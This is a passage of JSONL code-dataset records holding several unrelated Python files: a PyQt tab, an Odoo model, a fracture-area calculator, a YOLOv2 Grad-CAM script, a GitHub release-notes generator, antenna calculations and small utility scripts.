p::text\").getall())\n }","sub_path":"SyntaxDB/SyntaxDB/spiders/snippets.py","file_name":"snippets.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"610350712","text":"from PyQt5.QtWidgets import QLabel\nfrom PyQt5.QtWidgets import QPushButton\nfrom PyQt5.QtWidgets import QVBoxLayout\nfrom PyQt5.QtWidgets import QWidget\nfrom datetime import datetime\nimport numpy as np\n\n\nclass SummaryTab(QWidget):\n '''This is a Q-Widget that acts as a tab in a QTabWidget and displays a mpl-canvas.'''\n def __init__(self, parent):\n super(QWidget, self).__init__(parent)\n self.layout = QVBoxLayout(self)\n self.centralWidget = self.window()\n self.label1 = QLabel(self)\n\n # self.refreshButton = QPushButton('get data from servers')\n # self.refreshButton.clicked.connect(self.refreshCalendarData)\n # self.layout.addWidget(self.refreshButton)\n self.layout.addWidget(self.label1)\n #self.refreshCalendarData()\n self.showSummary()\n self.setLayout(self.layout)\n\n def showSummary(self):\n curWeekNum = datetime.today().isocalendar()[1]\n outString = \"Innerhalb der letzten {0} Wochen hast du ... \\n\".format(curWeekNum)\n df = self.parent().tabs.df\n selectedCalendars = df['calName'].unique()\n for cal in selectedCalendars:\n summary = df[df['calName'] == cal].groupby('weeknum').aggregate(np.sum)\n achieved = np.sum(summary['duration'] > 5)\n outString += \"... 
im Projekt {0} in {1} Wochen deine Ziele erreicht \\n\".format(cal, str(achieved))\n\n outString += \"\\n\"\n self.label1.setText(outString)\n","sub_path":"gui/summaryTab.py","file_name":"summaryTab.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"414268282","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass LigneProduitEmballage(models.Model):\n _name = 'gctjara.produitemballee'\n \n _rec_name = 'name'\n \n _sql_constraints = [\n ('produitemballée', 'unique (emballage_id , produit_id )', 'Cette emballage est déja crée')\n ] \n \n name = fields.Char(string='Nom' , compute='_compute_name')\n \n @api.depends('produit_id', 'emballage_id')\n def _compute_name(self):\n for r in self:\n if(isinstance(r.produit_id.name , unicode)) and isinstance(r.emballage_id.name,unicode)and isinstance(r.emballage_id.unite,unicode):\n if r.emballage_id.unite == u'Piece':\n r.name= r.produit_id.name \n else :\n r.name= r.produit_id.name + \" \"+ (r.emballage_id.name).strip()+\" \"+r.emballage_id.unite\n \n \n @api.one \n @api.depends('produit_id','emballage_id')\n def _prix_unit(self):\n for r in self:\n r.prixunit=r.produit_id.prixunit*r.emballage_id.poids\n @api.one \n @api.depends('produit_id','emballage_id')\n def _prix_vente(self):\n for r in self:\n r.prixvente=r.produit_id.prixvente*r.emballage_id.poids\n print(\"r.produit_id.prixvente ****>>\" +str(r.produit_id.prixvente))\n print(\"r.emballage_id.poids ****>>\" +str(r.emballage_id.poids))\n print(\" r.prixvente ****>>\" +str( r.prixvente))\n \n \n\n \n quantitestocke=fields.Integer(\n string ='Stock',\n default=0.0,\n digits=(16, 3)\n )\n \n produit_id = fields.Many2one(\n string='Produit',\n required=True,\n index=True,\n comodel_name='gctjara.produits',\n ondelete='set null'\n )\n \n prixunit= fields.Float(\n# related='produit_id.prixunit,emballage_id.poids',\n string='Prix unitaire',\n# default='_prix_unit',\n compute='_prix_unit',\n store=True,\n digits=(16, 3)\n )\n prixvente= fields.Float(\n# related='produit_id.prixvente,emballage_id.poids',\n string='Prix de vente',\n# default='_prix_vente',\n compute='_prix_vente',\n store=True,\n digits=(16, 3)\n )\n emballage_id = fields.Many2one(\n comodel_name='gctjara.emballage',\n string='Emballage',\n )\n \n lignecmd_id = fields.One2many(\n string='Commandes Achats',\n comodel_name='gctjara.lignecmdachat',\n inverse_name='embalageproduit_id'\n ) \n \n lignecmdvente_id = fields.One2many(\n string='Commandes Ventes',\n comodel_name='gctjara.lignecmdvente',\n inverse_name='embalageproduit_id'\n ) \n \n","sub_path":"models/ProduitEmballee.py","file_name":"ProduitEmballee.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"406549382","text":"# -*- coding: utf-8 -*-\n# RESET ALL\n#from IPython import get_ipython\n#get_ipython().magic('reset -sf')\nimport glob\nimport errno\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef PolyArea(x,y):\n return 0.5*np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1)))\n\ndef SegmentLength(x1,x2,y1,y2):\n return np.sqrt((x2-x1)**2 + (y2-y1)**2)\n\n\ndef FracArea(fpath_in_fracNodes, fpath_in_dispVec, plotting = False, norm_by_len = False): \n \"\"\"\n Created on Tue May 7 15:22:48 2019\n \n calculates area of polygons created from combined roxol crack nodes and displacement vectors,\n i.e. 
in effect fracture area\n \n inputs: \n fpath_in_fracNodes: file path for fracture nodes in format (x0 y0 x1 y1 ... for node coordinates) per fracture, and of the form \" path + '*_fracNodes.txt' \"\n fpath_in_dispVec: file path for fracture displacement Vectors in format (dx00 dy00 dx01 dy01 dx10 dy10 dx11 dy11 ... for bidirectional node displacement) per fracture, and of the form \" path + '*_dispVec.txt' \"\n plotting: True/False input. displays plots or not. Standard: False\n norm_by_len = True/False input. normalizes fracture area by respective fracture length or not. Standard: True\n \n @author: olerab\n \"\"\" \n files_fracNodes = sorted(glob.glob(fpath_in_fracNodes))\n files_dispVec = sorted(glob.glob(fpath_in_dispVec))\n \n if len(files_fracNodes)!=len(files_dispVec):\n raise Exception('Error, need same number of files containing \"fracNodes\" and \"displacementVectors\"')\n \n cnt = 0\n frac_area_lib = {}\n frac_area = list()\n frac_area_max = list()\n frac_area_min = list()\n frac_area_avg = list()\n frac_area_med = list()\n frac_area_std = list()\n frac_length = list()\n # read frac nodes and displacement vectors, and store them as doubles\n #create figure for boxplots\n\n for cnt in range (0,len(files_fracNodes)):\n #fnodes = np.genfromtxt(fracNodeFile, delimiter = \"\\t\")\n file_fracNodes = open(files_fracNodes[cnt],'r')\n i = 0\n fracNodes = {}\n for line in file_fracNodes:\n data = line.split()\n fracNodes[i] = np.array(np.float_(data))\n i += 1\n file_fracNodes.close()\n \n #fnodes = np.genfromtxt(fracNodeFile, delimiter = \"\\t\")\n file_dispVec = open(files_dispVec[cnt],'r')\n i = 0\n dispVec = {}\n for line in file_dispVec:\n data = line.split()\n dispVec[i] = np.array(np.float_(data))\n i += 1\n file_dispVec.close()\n \n # calculate length of each fracture in a result step to normalize area at a later stage \n fraclen = list() \n for i in range(0,len(fracNodes)):\n segments = list()\n for k in range(0,int(len(fracNodes[i])/2-2)):\n segments.append(SegmentLength(fracNodes[i][2*k],fracNodes[i][2*k+2],fracNodes[i][2*k+1],fracNodes[i][2*k+3]))\n \n fraclen.append(np.sum(segments))\n \n # build polygon nodes by combining frac nodes and displacement vectors\n polyNodes = {}\n polyarea = list()\n \n #extract pairwise displacement vectors\n \n for j in range(0,len(fracNodes)):\n disp1 = np.empty_like(fracNodes[j])\n disp2 = np.empty_like(fracNodes[j])\n disp1[0::2] = dispVec[j][0::4]\n disp1[1::2] = dispVec[j][1::4]\n disp2[0::2] = dispVec[j][2::4]\n disp2[1::2] = dispVec[j][3::4]\n \n #for k in range (0,len(fracNodes[j])):\n polyNodes[j] = np.append(fracNodes[j] + disp1, np.flip(fracNodes[j] + disp2))\n polyNodesx = np.append(polyNodes[j][0:len(fracNodes[j]):2], polyNodes[j][len(fracNodes[j])+1::2])\n polyNodesy = np.append(polyNodes[j][1:len(fracNodes[j]):2], polyNodes[j][len(fracNodes[j])::2])\n \n # calculate polunomial area, normalizeby the length (if desired)\n polyarea.append(PolyArea(polyNodesx,polyNodesy))\n \n # plot polygons\n # if you need...\n #plt.plot(polyNodesx,polyNodesy)\n \n #plt.show()\n \n frac_area_max.append(np.max(polyarea))\n frac_area_min.append(np.min(polyarea))\n frac_area_avg.append(np.mean(polyarea))\n frac_area_med.append(np.median(polyarea))\n frac_area_std.append(np.std(polyarea))\n if norm_by_len == True:\n frac_area.append(np.sum(polyarea)/np.sum(fraclen))\n else:\n frac_area.append(np.sum(polyarea))\n frac_area_lib[cnt] = frac_area\n frac_length.append(np.sum(fraclen))\n \n \n #plotting\n if plotting == True:\n # -------------------- total 
fracture area at each step\n fig1 = plt.figure(figsize=(10,5))\n ax1 = fig1.add_subplot(111)\n line, = ax1.plot(frac_area, lw=2, marker='o', color='mediumvioletred')\n \n ax1.set_title(fpath_in_fracNodes[35:-16], fontsize=18)\n ax1.set_xlabel(\"Simulation Step\", fontsize=18)\n ax1.set_ylabel(\"Total Fracture Area\", fontsize=18)\n plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n plt.grid(True)\n plt.show()\n fig1.savefig(fpath_in_fracNodes[:-15] + 'plot_TotalFracArea.png')\n \n # --------------------- max, min, mean, standard deviation at each step\n fig2 = plt.figure(figsize=(10,5))\n ax2 = fig2.add_subplot(111)\n #line, = ax2.plot(frac_area, lw=2)\n ax2.errorbar(np.linspace(0,len(frac_area_avg)-1,len(frac_area_avg)),frac_area_avg, yerr=[frac_area_min, frac_area_max], fmt='o', color='mediumvioletred')\n \n ax2.set_title(fpath_in_fracNodes[35:-16], fontsize=18)\n ax2.set_xlabel(\"Simulation Step\", fontsize=18)\n ax2.set_ylabel(\"Mean Fracture Area\", fontsize=18)\n \n ax2.plot(frac_area_med, lw=2, marker='o', color='red')\n plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n plt.grid(True)\n plt.show()\n fig2.savefig(fpath_in_dispVec[:-13] + 'plot_MeanMaxFracArea.png')\n else:\n print('PLOTTING DISABLED. use arg plotting = True to show plots')\n \n\n \n # return fracture area value\n return frac_area, frac_length\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"python/work_in_progress/FracArea.py","file_name":"FracArea.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"65110262","text":"import peewee_async\nfrom peewee import *\nfrom conf.op_conf import get_conf\nimport model\n\ndb = peewee_async.PooledMySQLDatabase(\n database=get_conf()['db'],\n user=get_conf()['username'],\n password=get_conf()['password'],\n host=get_conf()['host'],\n port=get_conf()['port']\n)\n\nobjs = peewee_async.Manager(db)\ndb.set_allow_sync(True)\n\n\nclass BaseModel(Model):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.trans = db.atomic_async # 将事务改成atomic_async\n self.objs = peewee_async.Manager(db) # 添加一个Manager类\n # add_time = DateTimeField(null=True, verbose_name=\"添加时间\")\n\n class Meta:\n database = db\n\n\ndef create_table():\n db.create_tables([model.index.Server, model.index.User])\n\n\nif __name__ == '__main__':\n create_table()","sub_path":"model/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"623474025","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nimport cv2\nimport numpy as np\nimport chainer\nimport glob\nimport os\nfrom chainer import serializers, optimizers, Variable, cuda\nimport chainer.functions as F\nfrom yolov2 import *\nfrom lib.utils import *\nfrom lib.image_generator import *\n\n\ndef generate_data(path):\n x = []\n t = []\n ground_truths = []\n img_orig = cv2.imread(path)\n #img = reshape_to_yolo_size(img_orig)\n img = cv2.resize(img_orig, (416, 416))\n w_fine = (float((img_orig.shape[1] / 32) * 32) / float(img_orig.shape[1]) )\n h_fine = (float((img_orig.shape[0] / 32) * 32) / float(img_orig.shape[0]) )\n \n fimg = img_orig.astype(np.float)\n input_height, input_width, _ = img.shape\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = np.asarray(img, dtype=np.float32) / 255.0\n img = img.transpose(2, 0, 1)\n x.append(img)\n\n\n ground_truths.append({\n \"x\": 0.67084,\n 
\"y\": 0.610435,\n \"w\": 0.227971 * w_fine,\n \"h\": 0.647691 * h_fine,\n \"label\": 0,\n }) \n\n t.append(ground_truths)\n x = np.array(x)\n return x, t, fimg\n# hyper parameters\ntrain_sizes = [320, 352, 384, 416, 448]\nitem_path = \"./items\"\nbackground_path = \"./backgrounds\"\ninitial_weight_file = \"./yolov2_darknet_coco.model\"\nweight_file = \"./yolov2_darknet_coco.model\"\nbackup_path = \"backup\"\nbackup_file = \"%s/backup.model\" % (backup_path)\nbatch_size = 16\nmax_batches = 1\nlearning_rate = 1e-5\nlearning_schedules = { \n \"0\" : 1e-5,\n \"500\" : 1e-4,\n \"10000\": 1e-5,\n \"20000\": 1e-6 \n}\n\nlr_decay_power = 4\nmomentum = 0.9\nweight_decay = 0.005\nn_classes = 80\nn_boxes = 5\n\n# load image generator\nprint(\"loading image generator...\")\ngenerator = ImageGenerator(item_path, background_path)\n\n# load model\nprint(\"loading initial model...\")\nyolov2 = YOLOv2(n_classes=n_classes, n_boxes=n_boxes)\n\nmodel = YOLOv2Predictor(yolov2)\nserializers.load_hdf5(weight_file, yolov2)\nmodel.unstable_seen = 0\nmodel.thresh = 0.5\n\nmodel.predictor.train = True\nmodel.predictor.finetune = False\ncuda.get_device(0).use()\n#model.to_gpu()\n\noptimizer = optimizers.MomentumSGD(lr=learning_rate, momentum=momentum)\noptimizer.use_cleargrads()\noptimizer.setup(model)\n#optimizer.add_hook(chainer.optimizer.WeightDecay(weight_decay))\n\n# start to train\nprint(\"start grad-cam\")\nfor batch in range(max_batches):\n if str(batch) in learning_schedules:\n optimizer.lr = learning_schedules[str(batch)]\n\n # generate sample\n x, t, fimg = generate_data('./data/people.png')\n x = Variable(x)\n #x.to_gpu()\n\n # forward\n gcam_layer = 22\n loss = model.gcam(x, t, target=gcam_layer)\n print(\"batch: %d learning rate: %f loss: %f\" % (batch, optimizer.lr, loss.data))\n\n # backward and optimize\n optimizer.zero_grads()\n loss.backward(retain_grad=True)\n weights = np.mean(yolov2.gcamout.grad, axis=(2, 3))\n #weights = abs(weights)\n gcam = np.tensordot(weights[0], yolov2.gcamout.data[0], axes=(0, 0))\n gcam = (gcam > 0) * gcam / gcam.max()\n gcam = (gcam * 255)\n gcam = cv2.resize(np.uint8(gcam), (fimg.shape[1], fimg.shape[0]))\n heatmap = cv2.applyColorMap(gcam, cv2.COLORMAP_JET)\n gcam = fimg + np.float32(heatmap)\n gcam = 255 * gcam / gcam.max()\n \n for truth_index in range(len(t[0])):\n left = int(t[0][truth_index][\"x\"]*gcam.shape[1] - t[0][truth_index][\"w\"]*gcam.shape[1]/2 ) \n top = int(t[0][truth_index][\"y\"]*gcam.shape[0] - t[0][truth_index][\"h\"]*gcam.shape[0]/2 ) \n right = int(t[0][truth_index][\"x\"]*gcam.shape[1] + t[0][truth_index][\"w\"]*gcam.shape[1]/2 ) \n bottom = int(t[0][truth_index][\"y\"]*gcam.shape[0] + t[0][truth_index][\"h\"]*gcam.shape[0]/2 ) \n cv2.rectangle(\n gcam,\n (left, top), (right, bottom),\n (0, 128, 255),\n 1\n )\n cv2.imwrite('gcam-{}.png'.format(gcam_layer), gcam)\n\n\n","sub_path":"yolov2_gcam.py","file_name":"yolov2_gcam.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"363383969","text":"\"\"\"\nScript that pulls specifically formatted PR descriptions\nto create release notes.\n\"\"\"\n\nimport os\nfrom enum import Enum\nimport requests\nimport json\nfrom github import Github\nimport argparse\nfrom datetime import datetime\n\n\nclass ReleaseNotes(object):\n class ExportType(Enum):\n TEXT = 0\n HTML = 1\n MARKDOWN = 2\n\n def __init__(self, release_notes):\n self.release_notes = release_notes\n\n def export(\n self,\n type_=ExportType.TEXT,\n 
file=None,\n        title_text=\"Release Notes\",\n        additional_text=\"\",\n    ):\n        if type_ == ReleaseNotes.ExportType.TEXT:\n            output = self._get_txt_output(title_text, additional_text)\n        elif type_ == ReleaseNotes.ExportType.HTML:\n            output = self._get_html_output(title_text, additional_text)\n        elif type_ == ReleaseNotes.ExportType.MARKDOWN:\n            output = self._get_markdown_output(title_text, additional_text)\n        else:\n            raise NotImplementedError()\n\n        if file:\n            dir_path = os.path.dirname(os.path.realpath(__file__))\n            print(\n                \"Exporting release notes into file:\\n{}\\n\".format(dir_path + \"/\" + file)\n            )\n            with open(file, \"w+\") as output_file:\n                output_file.write(output)\n\n        return output\n\n    def _get_txt_output(self, title_text, additional_text):\n        output = \"\"\n\n        output += title_text + \"\\n\\n\"\n        output += additional_text + \"\\n\\n\"\n        for key, values in self.release_notes.items():\n            # ignore items placed in the general description and just get following\n            # sections. Don't include section if empty\n            if key != \"general updates\" and values:\n                output += key.title() + \"\\n\"\n                for value in values:\n                    output += \" - \"\n                    output += ReleaseNotes._breakup_line(value)\n                    output += \"\\n\"\n                output += \"\\n\"\n        return output\n\n    def _get_html_output(self, title_text, additional_text):\n        output = \"\"\n\n        output += \"<html>\\n<head>\\n</head>\\n<body>\\n\"\n        output += \"<h1>{}</h1>\\n\".format(title_text)\n        output += \"<p>\\n\"\n        for line in additional_text.split(\"\\n\"):\n            output += \"{}<br>\\n\".format(line)\n        output += \"</p>\\n\"\n        for key, values in self.release_notes.items():\n            # ignore items placed in the general description and just get following\n            # sections. Don't include section if empty\n            if key != \"general updates\" and values:\n                output += \"<h2>\" + key.title() + \"</h2>\\n<ul>\\n\"\n                for value in values:\n                    output += \"<li>\"\n                    output += ReleaseNotes._breakup_line(value)\n                    output += \"</li>\\n\"\n                output += \"</ul>
\\n\"\n output += \"\\n\"\n return output\n\n def _get_markdown_output(self, title_text, additional_text):\n output = \"\"\n\n output += \"# {}\\n\\n\".format(title_text)\n output += additional_text.replace(\"\\n\", \"\\n\\n\") + \"\\n\\n\"\n for key, values in self.release_notes.items():\n # ignore items placed in the general description and just get following\n # sections. Don't include section if empty\n if key != \"general updates\" and values:\n output += \"## \" + key.title() + \"\\n\"\n for value in values:\n output += \" - \"\n output += ReleaseNotes._breakup_line(value)\n output += \"\\n\"\n output += \"\\n\"\n return output\n\n @staticmethod\n def _breakup_line(line):\n \"\"\"\n Keep it under 80 chars assuming two spaces, a dash, and another space in front\n ex:\n - this is a long line that we should probably break up into much smaller\n pieces so that's what this does. cool.\n \"\"\"\n output = line\n if len(line) > 76:\n output = \"\"\n words = line.split()\n total_length = 0\n\n # given a list of words, keep trying to add another word without going over\n # 76 chars\n while words and ((total_length + len(words[0])) < 76):\n total_length += len(words[0]) + 1 # 1 for space\n output += words[0] + \" \"\n del words[0]\n\n # hit 76 char limit or used all the words, new line\n output += \"\\n \"\n\n # more words? call this function recursively to continue breaking into chunks\n if words:\n output += ReleaseNotes._breakup_line(\" \".join(words))\n\n return output\n\n\ndef get_command_line_args():\n parser = argparse.ArgumentParser(description=\"Create release notes\")\n parser.add_argument(\n \"repo\", type=str, help=\"Tag to start getting release notes from.\"\n )\n parser.add_argument(\n \"from_tag\", type=str, help=\"Tag to start getting release notes from.\"\n )\n parser.add_argument(\n \"--to_tag\",\n type=str,\n default=\"latest\",\n help=\"Tag to stop collecting release notes at.\",\n )\n parser.add_argument(\n \"--file_name\",\n type=str,\n default=\"release_notes\",\n help=\"Name for file to export to. 
Don't include extention\",\n )\n parser.add_argument(\n \"--text\",\n action=\"store_const\",\n const=True,\n help=\"output a text file with release notes\",\n )\n parser.add_argument(\n \"--markdown\",\n action=\"store_const\",\n const=True,\n help=\"output a markdown file with release notes\",\n )\n parser.add_argument(\n \"--html\",\n action=\"store_const\",\n const=True,\n help=\"output an html file with release notes\",\n )\n parser.add_argument(\n \"--org\",\n type=str,\n default=\"uc-cdis\",\n help=\"Organization or person owning the specified repo\",\n )\n\n parser.add_argument(\n \"--github_access_token\",\n type=str,\n default=os.environ.get(\"ACCESS_TOKEN\"),\n help=\"\",\n )\n\n args = parser.parse_args()\n return args\n\n\ndef main(args=None):\n if args is None:\n args = get_command_line_args()\n if args.github_access_token:\n g = Github(args.github_access_token)\n else:\n g = Github()\n\n repo_path = args.org + \"/\" + args.repo\n repo = g.get_repo(repo_path)\n\n input_tag = args.from_tag\n\n if not input_tag:\n print(\"You didn't enter a git tag, can't get release notes.\")\n exit()\n\n tagged_commit_sha = get_commit_sha_from_tag(repo, input_tag)\n if not tagged_commit_sha:\n print(\n \"Tag {} doesn't exist in GitHub for repo: {}.\".format(\n input_tag, repo.full_name\n )\n )\n exit()\n\n tagged_commit = repo.get_commit(sha=tagged_commit_sha)\n tagged_commit_date = tagged_commit.commit.committer.date.isoformat()\n\n prs = get_pr_descriptions_since_date(\n tagged_commit_date, repo_path, github_access_token=args.github_access_token\n )\n\n release_notes_raw = {\"general updates\": []}\n for pr in prs:\n release_notes_raw = parse_pr_body(pr, release_notes_raw)\n\n release_notes = ReleaseNotes(release_notes_raw)\n additional_text = \"For: {}\\nNotes since tag: {}\\nGenerated: {}\\n\".format(\n repo.full_name, input_tag, datetime.now().date()\n )\n\n if args.markdown:\n release_notes.export(\n type_=ReleaseNotes.ExportType.MARKDOWN,\n file=args.file_name + \".md\",\n additional_text=additional_text,\n )\n\n if args.html:\n release_notes.export(\n type_=ReleaseNotes.ExportType.HTML,\n file=args.file_name + \".html\",\n additional_text=additional_text,\n )\n\n if args.text or not any([args.text, args.markdown, args.html]):\n release_notes.export(\n type_=ReleaseNotes.ExportType.TEXT,\n file=args.file_name + \".txt\",\n additional_text=additional_text,\n )\n\n\ndef get_pr_descriptions_since_date(\n tagged_commit_date, repo_path, github_access_token=None\n):\n get_pr_comments_query = \"\"\"query {\n search(first: 100, type: ISSUE, query: $QUERY) {\n edges {\n node {\n ... 
on PullRequest {\n title\n body\n }\n }\n }\n pageInfo {\n endCursor\n hasNextPage\n }\n }\n }\"\"\"\n get_pr_comments_query = get_pr_comments_query.replace(\n \"$QUERY\",\n '\"repo:{} state:closed type:pr created:>{}\"'.format(\n repo_path, tagged_commit_date\n ),\n )\n\n if github_access_token:\n headers = {\"Authorization\": \"Bearer {}\".format(github_access_token)}\n else:\n headers = {}\n\n data = json.dumps({\"query\": str(get_pr_comments_query)})\n response = requests.post(\n \"https://api.github.com/graphql\", headers=headers, data=data\n )\n prs = response.json().get(\"data\", {}).get(\"search\", {}).get(\"edges\", [])\n prs = [pr.get(\"node\", {}).get(\"body\") for pr in prs]\n return prs\n\n\ndef get_commit_sha_from_tag(repo, input_tag):\n tags = repo.get_tags()\n tagged_commit_sha = None\n for tag in tags:\n if tag.name == input_tag:\n tagged_commit_sha = tag.commit.sha\n\n return tagged_commit_sha\n\n\ndef parse_pr_body(body, release_notes):\n category = \"general updates\"\n for line in body.replace(\"\\r\", \"\").split(\"\\n\"):\n if line.startswith(\"###\"):\n category = line.replace(\"###\", \"\").strip().lower()\n if category not in release_notes:\n release_notes[category] = []\n elif line:\n line = parse_line(line)\n if line:\n release_notes[category].append(line)\n else:\n continue\n\n return release_notes\n\n\ndef parse_line(line):\n line = line.strip().strip(\"*\").strip().strip(\"-\").strip().strip(\"-\").strip()\n\n if (\n \"Please make sure to follow the [DEV guidelines]\" in line\n or line == \"Description about what this pull request does.\"\n or line == \"Implemented XXX\"\n or line == \"This pull request was generated automatically.\"\n or line == \"None\"\n ):\n return None\n\n return line\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"gen3git.py","file_name":"gen3git.py","file_ext":"py","file_size_in_byte":10419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"500682359","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n\ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value))\n idx2 = np.sort(idx)\n x1 = np.where(idx == idx2[0])\n x2 = np.where(idx == idx2[1])\n return array[x1], x1, array[x2], x2\n\n\ndef beamwidth(results):\n data = np.array(results)\n maximum_db = np.amax(data)\n print(data.size)\n x = np.linspace(0, 361, 361)\n xvals = np.linspace(0, 361, 1000)\n yinterp = np.interp(xvals, x, data)\n half_power1, halfpower_ind1, half_power2, halfpower_ind2 = find_nearest(yinterp, (maximum_db - 3))\n beamwidth_value = abs(xvals[halfpower_ind1] - xvals[halfpower_ind2])\n beamwidth_angle1 = xvals[halfpower_ind1]\n beamwidth_angle2 = xvals[halfpower_ind2]\n return beamwidth_value, half_power1, beamwidth_angle1, half_power2, beamwidth_angle2\n\n\ndef bandwidth_6dB(results):\n data = np.array(results)\n maximum_db = np.amax(data)\n x = np.linspace(0, 361, 361)\n xvals = np.linspace(0, 361, 1000)\n yinterp = np.interp(xvals, x, data)\n bandwidth_power1, bandwidth_ind1, bandwidth_power2, bandwidth_ind2 = find_nearest(yinterp, (maximum_db - 6))\n bandwidth_6dB_value = abs(xvals[bandwidth_ind1] - xvals[bandwidth_ind2])\n bandwidth_angle1 = xvals[bandwidth_ind1]\n bandwidth_angle2 = xvals[bandwidth_ind2]\n return bandwidth_6dB_value, bandwidth_power1, bandwidth_angle1, bandwidth_power2, bandwidth_angle2\n\n\ndef gain_calculator(frequency, input_power, gref, distance, results):\n data = np.array(results)\n Pr = np.sum(data)\n 
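# Friis free-space link equation rearranged for antenna gain,\n    # G = Pr * (4*pi*d)^2 / (Pt * Gref * lambda^2); note that physically\n    # wavelength = c / frequency, so the 1 / frequency below assumes normalized units.\n    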
wavelength = 1 / frequency\n gain = (Pr * pow(4 * np.pi * distance, 2)) / (input_power * gref * pow(wavelength, 2))\n return gain\n\n\ndef directivity(beamwidth_angle1, beamwidth_angle2):\n kraus = 41.253 / (beamwidth_angle1 * beamwidth_angle2)\n tai_pereira = 22.181 / (pow(beamwidth_angle1, 2) * pow(beamwidth_angle2, 2))\n return kraus, tai_pereira\n\n\ndef total_calculation(results, frequency, input_power, gref, distance):\n print(\"calculatin total inside\")\n beamwidth_value, half_power1, beamwidth_angle1, half_power2, beamwidth_angle2 = beamwidth(results)\n print(\"calculating beamwidth\")\n bandwidth_6dB_value, bandwidth_power1, bandwidth_angle1, bandwidth_power2, bandwidth_angle2 = bandwidth_6dB(results)\n print(\"Bandwidth\")\n gain = gain_calculator(frequency, input_power, gref, distance, results)\n kraus, tai_pereira = directivity(beamwidth_angle1, beamwidth_angle2)\n print(\"Calculating finished\")\n\n return beamwidth_value, bandwidth_6dB_value, gain, kraus, tai_pereira\n\n\nif __name__ == \"__main__\":\n calibrate_cn0150()\n","sub_path":"calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"516106827","text":"def split(arr,num,pos):\n\t\n\tdup = []\n\tfor k in range(pos+1,num,1):\n\t\tdup.append(arr[k])\n\tfor j in range(0,pos+1,1):\n\t\tdup.append(arr[j])\n\tprint(\"Array after split and join is : \",dup)\n\t\n\n\narr = []\n\nnum = int(input(\"Enter the number of elements in an array : \"))\nfor i in range(0,num):\n\tprint(\"Enter element {}\".format(i))\n\telem = int(input())\n\tarr.append(elem)\n\npos = int(input(\"Enter the position after which you want a split : \"))\n\nsplit(arr,num,pos)","sub_path":"Anashka_folder/split_arr.py","file_name":"split_arr.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"507560273","text":"\nimport os\nimport re\nimport 清洗数据\nimport 下载封面\n\n\ndef file_name(file_dir):\n msg = {\n \"root\": [],\n \"dirs\": [],\n \"files\": [],\n\n }\n for root, dirs, files in os.walk(file_dir):\n # print(root) # 当前目录路径\n # print(dirs) # 当前路径下所有子目录\n # print(files) # 当前路径下所有非目录子文件\n msg[\"root\"] = root\n msg[\"dirs\"].append(dirs)\n msg[\"files\"].append(files)\n return msg\n\n\ndef file_extension(path):\n return os.path.splitext(path)[1]\n\n\ndef 格式化本地(url):\n msg = file_name(url)\n\n file_dict = {\"content\": [],\n \"后缀\": [],\n }\n\n for file in msg[\"files\"]:\n for i in file:\n file_dict[\"content\"].append(i)\n file_dict[\"后缀\"].append(file_extension(\n os.path.join(str(msg['root']), i))) # 文件后缀名\n\n 数据 = 清洗数据.match_id(file_dict)\n path = url\n num = 0\n while num < 数据[\"num\"]:\n # print(数据)\n # print(数据['id'][num])\n # print(file_dict['content'][num])\n # print(数据['has_chinese'])\n # print(file_dict['后缀'][num])\n old_name = os.path.join(path, file_dict['content'][num])\n\n 番号数据 = 下载封面.番号搜索(数据['id'][num])\n # print(番号数据)\n 标题 = re.sub(\"[/\\:*\\\"<>|?]+\", \" \", 番号数据['标题'])\n if 数据['id'][num] in 数据['has_chinese']:\n # print(数据['id'][num]+\"有中文\")\n if 'favorite' in file_dict['content'][num]:\n new_name = os.path.join(\n path, 数据['id'][num]+\"-C \"+标题+'[ favorite ]'+file_dict['后缀'][num])\n else:\n new_name = os.path.join(\n path, 数据['id'][num]+\"-C \"+标题+file_dict['后缀'][num])\n else:\n try:\n new_name = os.path.join(\n path, 数据['id'][num]+\" \"+标题+file_dict['后缀'][num])\n\n if 'favorite' in file_dict['content'][num]:\n 
